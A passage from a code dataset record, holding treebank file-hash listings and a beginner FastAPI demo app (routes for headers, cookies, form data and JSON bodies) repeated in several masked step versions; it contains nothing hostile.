'f4d097d076083240c48594d4cb058840ff16be8e'),\n 'train': ('la_ittb-ud-train.conllu',\n '627d5b30b20655efab194c75fc9219b0aa2cf4b6')},\n 'la_proiel': {'dev': ('la_proiel-ud-dev.conllu',\n '9a510ff1f29b507ce46d32c04eb8f02ec8bdb4fb'),\n 'test': ('la_proiel-ud-test.conllu',\n '697dbeae38507856a4fafa8506dfc8db5e8e4054'),\n 'train': ('la_proiel-ud-train.conllu',\n '5e57e0a83ed8dcdfcc892c2558249cb6bc02b37a')},\n 'la': {'dev': ('la-ud-dev.conllu',\n '2748bb0479cb599e1a007d1d1634d5870b45549b'),\n 'test': ('la-ud-test.conllu',\n '19c62c64ce41a650e9b55a345c61e7c0d994816e'),\n 'train': ('la-ud-train.conllu',\n '183ce6f58b0305e5926161e29b9a6aacc424662c')},\n 'lv': {'dev': ('lv-ud-dev.conllu',\n '6bf3843d92aeb5b4a5e3b457708ad0aca176fbd2'),\n 'test': ('lv-ud-test.conllu',\n '9f7806a24656db0e859efe041a88926b220b8e28'),\n 'train': ('lv-ud-train.conllu',\n 'f1eeff608e8f27d92b683ae041591355198841eb')},\n 'lt': {'dev': ('lt-ud-dev.conllu',\n '0b8dc19005571fa7b66d8302b797d51a241f128b'),\n 'test': ('lt-ud-test.conllu',\n 'def54d6caf97610eb4ca8c0179d661c8eab98951'),\n 'train': ('lt-ud-train.conllu',\n '13fe42a3d21f17a5cad5aaf38692619c7713e177')},\n 'mr': {'dev': ('mr-ud-dev.conllu',\n 'abf7ac90a3696bb979e6ddc17cbc0fc761040b1b'),\n 'test': ('mr-ud-test.conllu',\n 'b70e2a135e69dc17474951bfd9c7cf3f203d4798'),\n 'train': ('mr-ud-train.conllu',\n '24a1370184054a7f5af647997dca783d6c571242')},\n 'sme': {'sample': ('sme-ud-sample.conllu',\n '8c456f06b363c4d273fc454a49505f783f00fe43'),\n 'test': ('sme-ud-test.conllu',\n '6c2084f60d7f2d1468a0cb4f4a4b9669274b122e'),\n 'train': ('sme-ud-train.conllu',\n '203eab4183fd585efe3fea7e6df493a6746b0a9f')},\n 'no_bokmaal': {'dev': ('no_bokmaal-ud-dev.conllu',\n '3a1aa6646ee62c605a6e5a7b535434ce93d0581f'),\n 'test': ('no_bokmaal-ud-test.conllu',\n '18336ef0e4877ae28eb7d6019afe05b5a53245d5'),\n 'train': ('no_bokmaal-ud-train.conllu',\n 'c6a1d75956dfb9376e568bf241b3ee5ebf3be3a5')},\n 'no_nynorsk': {'dev': ('no_nynorsk-ud-dev.conllu',\n '5b95a070d11a61a23fc340ecbbbbb70f86884498'),\n 'test': ('no_nynorsk-ud-test.conllu',\n '3eaab8e4af82de2333521e9be0954ffaf6b1440b'),\n 'train': ('no_nynorsk-ud-train.conllu',\n '79319993097c30ddf28d4c1137b8662f4f35d17e')},\n 'no_nynorsklia': {'dev': ('no_nynorsklia-ud-dev.conllu',\n 'f3e3cc9b156784c12e7540b6e09a19963df8d7d9'),\n 'test': ('no_nynorsklia-ud-test.conllu',\n 'c43abf4ad0d9c1d844edb9ff0fdf8b00949c4a0b')},\n 'cu': {'dev': ('cu-ud-dev.conllu',\n '0b67035ed5ca52aeefae443611232ed202fb990a'),\n 'test': ('cu-ud-test.conllu',\n '0fed872a5a2480b601c67ebbecf8dcd680b6863b'),\n 'train': ('cu-ud-train.conllu',\n '1c58f7322b96aa65e2b6bbeb5cb5226b46dc3ef0')},\n 'fa': {'dev': ('fa-ud-dev.conllu',\n '098f97ff4c0a6a9dcaafe2c83908b1ff044b4446'),\n 'test': ('fa-ud-test.conllu',\n '0024aa6bad5eceed2e36f77d88578304a5886a80'),\n 'train': ('fa-ud-train.conllu',\n '1692f90f58fb1ed2faaa4e8c5d2d47a37c47082b')},\n 'pl': {'dev': ('pl-ud-dev.conllu',\n 'b7af7bee091feb0788eb9793a7102972006421dc'),\n 'test': ('pl-ud-test.conllu',\n 'e141e793ba35f8a08510ec1ce494099b5c800ca8'),\n 'train': ('pl-ud-train.conllu',\n 'f2227ba184a5030fc47b1aff732e04ae11b9ab94')},\n 'pt_br': {'dev': ('pt_br-ud-dev.conllu',\n '8eedc77096a87fe8ab251100d460780e161e5397'),\n 'test': ('pt_br-ud-test.conllu',\n '37a64e3acef107b62ab62ce478fc36ed112fb58f'),\n 'train': ('pt_br-ud-train.conllu',\n '023cafcb6959d52298ad619f7838f26db9798aa9')},\n 'pt_pud': {'test': ('pt_pud-ud-test.conllu',\n '4f7a98b59255ff58a1a423dda6f2cb7261dcea7d')},\n 'pt': {'dev': ('pt-ud-dev.conllu',\n '2171b4ac2b0726c9dfae6adf394b76be927accab'),\n 'test': ('pt-ud-test.conllu',\n '9e819a4592db42905806141d6fca3b7b20396ce3'),\n 'train': ('pt-ud-train.conllu',\n 'b5fbb6598d5cc53a0f7e699adeb4a61948a49b5c')},\n 'ro_nonstandard': {'test': ('ro_nonstandard-ud-test.conllu',\n '300d53091412dc5700dc5cad0fd3e136f7c8cb11'),\n 'train': ('ro_nonstandard-ud-train.conllu',\n 'ed97f51129b63857627f838f68f41c9ef8541686')},\n 'ro': {'dev': ('ro-ud-dev.conllu',\n 'a320e29582e837fa48bbe0aab8e205cadfcb4a02'),\n 'test': ('ro-ud-test.conllu',\n '0cfe4806a28ebdc02dc7ea58635d8b550c3a9d7b'),\n 'train': ('ro-ud-train.conllu',\n '74beb2aa92d2fca50dbb1a4f716b936afb436ab9')},\n 'ru_pud': {'test': ('ru_pud-ud-test.conllu',\n 'bca81ce7aaf3cb8add98b19faecc1d8303901631')},\n 'ru_syntagrus': {'dev': ('ru_syntagrus-ud-dev.conllu',\n '304c6ec7fb5060583af5f890384e3a480f8c3ad5'),\n 'test': ('ru_syntagrus-ud-test.conllu',\n 'c138e39b48dc1c66d106e68ee75c6fce28ef780c'),\n 'train': ('ru_syntagrus-ud-train.conllu',\n '8fa56fa80845e4ad946189d1e7af228b5595e312')},\n 'ru': {'dev': ('ru-ud-dev.conllu',\n 'd3b11c0fd8a87bfb7ce9666a1888126ae5ddca90'),\n 'test': ('ru-ud-test.conllu',\n 'ae13bbf49e0d2fddae8ba2eeacd15a9a77c7bfff'),\n 'train': ('ru-ud-train.conllu',\n 'fd43e7323ad2e62a6924fc5b5d48e85c6ab5a430')},\n 'sa': {'test': ('sa-ud-test.conllu',\n 'fad3a03a6834884a092b1d326625c6f663e36636')},\n 'sr': {'dev': ('sr-ud-dev.conllu',\n 'dcb9a242986285e83512ddaa4b3ada07c4cea17a'),\n 'test': ('sr-ud-test.conllu',\n '0f0c9e394c440bb2dd514bdd6873d3ffef13821b'),\n 'train': ('sr-ud-train.conllu',\n '97ea9bfe4ac97011598fbb5ca20b5cbaf5093334')},\n 'sk': {'dev': ('sk-ud-dev.conllu',\n 'c84563c08922d60b0c765e9f9c22d9f6f2765ff9'),\n 'test': ('sk-ud-test.conllu',\n '89af4581c5f9058809f48788eb635a92cda0603c'),\n 'train': ('sk-ud-train.conllu',\n '89e108093bbf5619578955fdadfe200cefd8cf01')},\n 'sl_sst': {'dev': ('sl_sst-ud-dev.conllu',\n 'c65ae82123af95ec11f47262546b5ab2fc5735e5'),\n 'test': ('sl_sst-ud-test.conllu',\n '144a0124c1181b49d0c542a4a6d4465e45545f3b'),\n 'train': ('sl_sst-ud-train.conllu',\n '4cbb97d5c19cfb1d85cdd54a13e24de2343a4ac5')},\n 'sl': {'dev': ('sl-ud-dev.conllu',\n '0078572c19574d32defeae9924176da2dd701ede'),\n 'test': ('sl-ud-test.conllu',\n '616ace00e25df99be8dd49b7bf7c48f1093df96a'),\n 'train': ('sl-ud-train.conllu',\n '1462ac69163b30cf1399527e95f686ebf91be2d3')},\n 'es_ancora': {'dev': ('es_ancora-ud-dev.conllu',\n '94b00cc6449a1793b5ba1d9d5c1e4b34ad1cc7d5'),\n 'test': ('es_ancora-ud-test.conllu',\n '8d7dc8d8441e1ca4b54708a5382ed61b48bf7920'),\n 'train': ('es_ancora-ud-train.conllu',\n '95d5bf7ad33304f3440ffb014ac094c4967c303f')},\n 'es_pud': {'test': ('es_pud-ud-test.conllu',\n 'c2b17fce1da3bdd2a50d9dd7eca101db1d2907e0')},\n 'es': {'dev': ('es-ud-dev.conllu',\n '4cdb828c492c6b7707af0ab6c7fbf734f770630a'),\n 'test': ('es-ud-test.conllu',\n 'afd1ae1b7eb73a91456c30acf388eef4faf4785a'),\n 'train': ('es-ud-train.conllu',\n '5ce48b44ba1b3e748a40cb5bf893d3096518ecbc')},\n 'sv_lines': {'dev': ('sv_lines-ud-dev.conllu',\n '15f1a04d960518fe7bfee23ce227fc7b78d4b755'),\n 'test': ('sv_lines-ud-test.conllu',\n '843df4ea3ab4f551b1eaa661652a8d6489a81d41'),\n 'train': ('sv_lines-ud-train.conllu',\n '16e3533bf174b36d728847a36a3600f16c63baa6')},\n 'sv_pud': {'test': ('sv_pud-ud-test.conllu',\n '18dadac0c15468256b340835ebc0529facbe9b73')},\n 'sv': {'dev': ('sv-ud-dev.conllu',\n '6d14e1aae5c9ae37c35481c44c04bf74a4233455'),\n 'test': ('sv-ud-test.conllu',\n '7ead0f7b49508db0022c042195ac5925b611c5b7'),\n 'train': ('sv-ud-train.conllu',\n '68affb85efde6ed017eab1e998e9666108559e04')},\n 'swl': {'dev': ('swl-ud-dev.conllu',\n '828e0a08f12cabfa75f9dd2b53dba58606522a7c'),\n 'test': ('swl-ud-test.conllu',\n '674f76631cf16172d67b795ff92dfbb297eb4930'),\n 'train': ('swl-ud-train.conllu',\n '46b721f9cae2d5ba43f818dd487600b0ce76362a')},\n 'ta': {'dev': ('ta-ud-dev.conllu',\n '4d01f555012ddc1976933d4d928e26470f71bfa1'),\n 'test': ('ta-ud-test.conllu',\n 'e8db8816a98d8b7e81188786db7c405979a7e3c3'),\n 'train': ('ta-ud-train.conllu',\n '6753d8c7b1b016de39c087aab45056de6021c3ae')},\n 'te': {'dev': ('te-ud-dev.conllu',\n '29f46355d767e54e8565f76a063c43e95ead0fca'),\n 'test': ('te-ud-test.conllu',\n '50abe345d4ab5bae021cacd096266c57b00572b8'),\n 'train': ('te-ud-train.conllu',\n '1794469abe09e7364cda0d9764cf515dcb4a61b6')},\n 'tr_pud': {'test': ('tr_pud-ud-test.conllu',\n 'aae839e2476a2f149c98e0274d245d07a50dafaa')},\n 'tr': {'dev': ('tr-ud-dev.conllu',\n '421de4d8d0fbdda46750523bde72880414c134a3'),\n 'test': ('tr-ud-test.conllu',\n 'b175f136f6f0271c494a58a1846971c4a07cda27'),\n 'train': ('tr-ud-train.conllu',\n '5aeaf25fc9e00c75e377983a0d0a642e4df6ae7d')},\n 'uk': {'dev': ('uk-ud-dev.conllu',\n '0d3e3507edcd46a3eaa8c4702d0f5d84661a6d9d'),\n 'test': ('uk-ud-test.conllu',\n '46c88fd623894fabdafb01a826016c215e4f65cc'),\n 'train': ('uk-ud-train.conllu',\n 'd06e0e2fa67c35a20517738bd728ac3b26d8eafe')},\n 'hsb': {'sample': ('hsb-ud-sample.conllu',\n '148eddbb19b06115ea54e17a3fca58e99a85cbd9'),\n 'test': ('hsb-ud-test.conllu',\n '3d319288b4c06395b2627980737131995949f770')},\n 'ur': {'dev': ('ur-ud-dev.conllu',\n 'dc41e72b5adeb92f308cdc8dfcbf71f84b4a5cf9'),\n 'test': ('ur-ud-test.conllu',\n 'af5da25be4c4ec1f2a222bc462b39ca4bbcc0eb0'),\n 'train': ('ur-ud-train.conllu',\n '488d65b394d0de264be1221614c09e541f92f9de')},\n 'ug': {'dev': ('ug-ud-dev.conllu',\n 'a2e6cd7ef51ffd7c83de7c62fbad998f1020f857'),\n 'test': ('ug-ud-test.conllu',\n '4877323d8dbfaa8ab862f0aa8e5484fdadb9ef43')},\n 'vi': {'dev': ('vi-ud-dev.conllu',\n '1c733d3ea3e4cce00cb0aa4d599bcb3b0a6096a8'),\n 'test': ('vi-ud-test.conllu',\n '1bb822e58f21aa5ccac15fe6c6742a42e8389d41'),\n 'train': ('vi-ud-train.conllu',\n 'ac86132afc061625740abd524c5cdf3d35ebbbc4')}}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query
from fastapi.responses import HTMLResponse
from typing import Optional
from fastapi.testclient import TestClient
from typing import List, Callable
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
from fastapi.exceptions import RequestValidationError
from fastapi.routing import APIRoute
from starlette.responses import JSONResponse
from pydantic import BaseModel
import uvicorn
import time
payloads = {
'peoples': [
{
'firstname': 'watcharapon',
'lastname': 'weeraborirak',
'age': '24',
'city': 'bangkok'
},
{
'firstname': 'somsak',
'lastname': 'tamjai',
'age': '22',
'city': 'bangkok'
},
{
'firstname': 'rakkana',
'lastname': 'meejai',
'age': '66',
'city': 'outcast'
},
]
}
class Item(BaseModel):
name: str
price: float
class ValidationError(APIRoute):
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def customer_route_handler(request: Request) -> Response:
try:
return await original_route_handler(request)
except RequestValidationError as exc:
body = await request.body()
detail = {'error': exc.errors(), 'body': body.decode()}
raise HTTPException(status_code=200, detail=detail)
return customer_route_handler
app = FastAPI()
app.router.route_class = ValidationError
app.mount('/static', StaticFiles(directory='static'), name='static')
templates = Jinja2Templates(directory='templates')
client = TestClient(app)
@app.middleware('http')
async def add_process_time_header(request: Request, call_next):
start_time = time.time()
response = await call_next(request)
process_time = time.time() - start_time
response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))
return response
@app.middleware('http')
async def add_process_name(request: Request, call_next):
response = await call_next(request)
response.headers['X-Owner-Server'] = 'Kane'
return response
@app.post('/items')
async def base_model(item: Item):
item_dict = item.dict()
return {'message': item_dict}
@app.put('/items/{item_id}')
async def item_id(item_id: int, item: Item):
return {'item_id': item_id, **item.dict()}
@app.get("/items_id/{item_id}")
async def read_items(
item_id: int = Path(..., title="The ID of the item to get"),
q: Optional[str] = Query(None, alias="item-query")
):
results = {"item_id": item_id}
if q:
results.update({"q": q})
return results
@app.get('/peoples')
async def fetch_movies(query: str = None): # query param string
payload = [p[query] for p in payloads['peoples']]
return payload
@app.get('/member')
async def member(item: Item, X_Item_ID: str = Header(...)): # Header
print(X_Item_ID)
if X_Item_ID != 'member':
raise HTTPException(status_code=400, detail="X-Item-ID header invalid")
return JSONResponse(content={item.name: 'kane', item.price: 123.33})
@app.get('/member/token')
async def member_token(x_token: str = Cookie(None)):
print(x_token)
return {'message': f'success cookie {x_token}'}
@app.get('/api_body/{item_id}') # dynamic route
async def api_body(item_id: str):
return {'item_id': item_id}
@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)
async def payload_request(item: Item):
return item
@app.post("/payload_json")
async def create_item(payload: dict = Body(...)):
print(payload)
return payload
@app.post('/form_data')
async def form_data(password: str = Form(...), username: str = Form(...)):
return {'message': {'user': username, 'pwd': password}}
@app.post('/cookies')
async def cookies(response: Response):
response.set_cookie(key='foo', value='value')
return {'message': 'cookies darken'}
@app.get('/')
@app.get('/index', tags=['dashboard'])
async def index(request: Request):
return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})
@app.get("/func_element", response_model=Item, tags=["Description"], deprecated=True)
async def func_element(item: Item):
"""
Get Data Element:
- **name**: my_name
- **price**: price
"""
return item
@app.post("/func_item", response_model=Item, tags=["Description"], summary="Create an item",
description="Create an item with all the , name, description, price, tax and a set of unique tags")
async def fuc_item(item: Item):
update_item = item.dict()
update_item['name'] = 'kane_ja'
return update_item
@app.post('/json_response', response_model=Item, tags=['Description'])
async def json_response(item: Item):
"""
Return JsonResponse
- **Item**: name
- **status**: 201
"""
return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)
if __name__ == '__main__':
uvicorn.run('fastapi_route_config:app', debug=True, port=8080)
|
normal
|
{
"blob_id": "70188d011ef60b1586864c4b85a9f9e70e5a4caf",
"index": 7386,
"step-1": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\napp.mount('/static', StaticFiles(directory='static'), name='static')\n<mask token>\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-3": "<mask token>\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-4": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-5": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\n\npayloads = {\n 'peoples': [\n {\n 'firstname': 'watcharapon',\n 'lastname': 'weeraborirak',\n 'age': '24',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'somsak',\n 'lastname': 'tamjai',\n 'age': '22',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'rakkana',\n 'lastname': 'meejai',\n 'age': '66',\n 'city': 'outcast'\n },\n ]\n}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n def get_route_handler(self) -> Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) -> Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n 